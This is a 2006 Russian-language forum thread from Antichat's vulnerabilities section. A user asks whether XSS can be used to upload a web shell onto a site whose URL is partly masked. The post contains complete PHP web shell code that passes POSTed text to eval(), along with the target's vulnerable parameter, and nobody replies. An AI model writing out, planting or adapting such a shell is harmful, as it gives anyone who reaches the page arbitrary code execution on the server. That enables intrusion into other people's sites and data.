ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Про Xss
  #1  
Старый 09.12.2006, 13:43
Аватар для GrAmOzEkA
GrAmOzEkA
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669

Репутация: 178
По умолчанию Про Xss

Народ поскажите хсс только ворует куки или можно как то через это загрузить шелл например вот этот:
Код:
<?

$docr = $_SERVER['DOCUMENT_ROOT'];

$gpc = get_magic_quotes_gpc();
if (!empty($_POST['c'])) {
	$c = $gpc ? stripslashes($_POST['c']) : $_POST['c'];
} else {
	$c = NULL;
}

?><form action="" method="post">
<textarea cols="80" rows="30" name="c" id="c"><?=$c; ?></textarea>
<br><input type="submit">
</form><?

if (!is_null($c)) eval($c);
?>
Урл сайта имеет вид: http://*****.ru/info.php?log=[XSS]
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Кто ещё не знает про пассивную XSS в bitrix? _kREveDKo_ Уязвимости 1 30.11.2009 18:32
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
Статья от novichka про АНтичат. Егорыч+++ Болталка 48 14.07.2006 17:09
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Раскажите про методы Xss актак Gl0ck Уязвимости 4 23.04.2006 17:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ